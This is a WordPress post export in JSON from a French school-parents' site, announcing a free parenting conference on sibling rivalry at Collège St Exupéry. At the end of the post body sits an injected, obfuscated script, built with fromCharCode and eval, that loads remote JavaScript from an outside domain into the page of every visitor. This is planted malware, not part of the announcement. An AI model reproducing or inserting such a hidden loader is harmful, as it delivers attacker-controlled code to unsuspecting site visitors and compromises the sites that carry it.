{"id":7474,"date":"2017-01-08T16:13:39","date_gmt":"2017-01-08T15:13:39","guid":{"rendered":"http:\/\/education.acctif.eu\/?p=7474"},"modified":"2018-01-23T16:47:41","modified_gmt":"2018-01-23T15:47:41","slug":"conference-sur-la-parentalite-au-college-st-exupery","status":"publish","type":"post","link":"http:\/\/actifeducation.fr\/?p=7474","title":{"rendered":"Conf\u00e9rence sur la parentalit\u00e9 au Coll\u00e8ge St Exup\u00e9ry"},"content":{"rendered":"<p>Les parents d&rsquo;\u00e9l\u00e8ves des 3 coll\u00e8ges fresnois (St Exup\u00e9ry, Fromond et Charcot) sont invit\u00e9s \u00e0 venir assister \u00e0 une <strong>conf\u00e9rence sur la parentalit\u00e9<\/strong>, organis\u00e9e par l&rsquo;association <a href=\"http:\/\/unenfantdanslaville.org\/\">Un Enfant Dans La Ville<\/a>, <span style=\"text-decoration: underline;\"><strong>le mardi 17 janvier \u00e0 20h30 au coll\u00e8ge St Exup\u00e9ry.<\/strong><\/span><\/p>\n<p><a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/screen-shot-2017-01-08-at-3-55-26-pm.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-7475 size-medium\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/screen-shot-2017-01-08-at-3-55-26-pm.png?w=211\" alt=\"Conf\u00e9rence Parentalit\u00e9 UEDLV\" width=\"211\" height=\"300\" \/><\/a><\/p>\n<div>Cette conf\u00e9rence est totalement gratuite et sera suivie d&rsquo;un pot de convivialit\u00e9.<\/div>\n<div><\/div>\n<blockquote>\n<div>\n<div class=\"page\" title=\"Page 2\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>Les enfants d\u2019une m\u00eame famille peuvent parfois e\u0301prouver des difficulte\u0301s a\u0300 s\u2019entendre entre eux. Il peut me\u0302me leur arriver de faire face a\u0300 des conflits assez se\u0301rieux. Disputes, chamailleries et moqueries pe\u0300sent alors lourdement sur le climat familial.<\/p>\n<p>Quand, en plus, cela se te\u0301lescope avec les e\u0301motions et les humeurs d\u2019un ou plusieurs ado, c\u0327a peut vite devenir un vrai calvaire pour toute la famille !<\/p>\n<p>\u25cf Comment intervenir utilement quand les enfants se disputent ?<\/p>\n<p>\u25cf Comment atte\u0301nuer les sentiments de jalousie et de rivalite\u0301 au sein de la fratrie ?<\/p>\n<p>\u25cf Comment aider ses enfants a\u0300 mieux vivre ensemble au quotidien ?<\/p>\n<p>Autant de questions auxquelles <a href=\"http:\/\/www.aimerportersigner.net\/cv\">Audrey Carroue\u0301, coach parental<\/a>, pourra re\u0301pondre, tout en pre\u0301sentant ses connaissances en neurosciences pour mieux comprendre les besoins, les e\u0301motions et les re\u0301actions de nos ados.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/blockquote>\n<div><strong>IMPORTANT &#8211; \u00a0IMPORTANT &#8211; IMPORTANT\u00a0<\/strong><\/div>\n<div>Afin de pouvoir acc\u00e9der au coll\u00e8ge et en raison du plan Vigipirate, il faudra vous munir d&rsquo;<strong>une pi\u00e8ce d&rsquo;identit\u00e9<\/strong>,\u00a0et du <strong>flyer ci-dessous d\u00fbment compl\u00e9t\u00e9<\/strong>.<\/div>\n<div><a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/screen-shot-2017-01-08-at-4-09-39-pm.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-7477 size-large\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/screen-shot-2017-01-08-at-4-09-39-pm.png?w=700\" alt=\"Flyer UEDLV \u00e0 compl\u00e8ter\" width=\"700\" height=\"1002\" \/><\/a><\/div>\n<div><\/div>\n<p><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Les parents d&rsquo;\u00e9l\u00e8ves des 3 coll\u00e8ges fresnois (St Exup\u00e9ry, Fromond et Charcot) sont invit\u00e9s \u00e0 venir assister \u00e0 une conf\u00e9rence sur la parentalit\u00e9, organis\u00e9e par l&rsquo;association Un Enfant Dans La Ville, le mardi 17 janvier \u00e0 20h30 au coll\u00e8ge St Exup\u00e9ry. Cette conf\u00e9rence est totalement gratuite et sera suivie d&rsquo;un pot de convivialit\u00e9. Les enfants &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"http:\/\/actifeducation.fr\/?p=7474\"> <span class=\"screen-reader-text\">Conf\u00e9rence sur la parentalit\u00e9 au Coll\u00e8ge St Exup\u00e9ry<\/span> Lire la suite\u00a0\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":7664,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"categories":[39],"tags":[],"class_list":["post-7474","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-saint-exupery"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7474","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7474"}],"version-history":[{"count":1,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7474\/revisions"}],"predecessor-version":[{"id":7665,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7474\/revisions\/7665"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/media\/7664"}],"wp:attachment":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7474"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7474"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7474"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}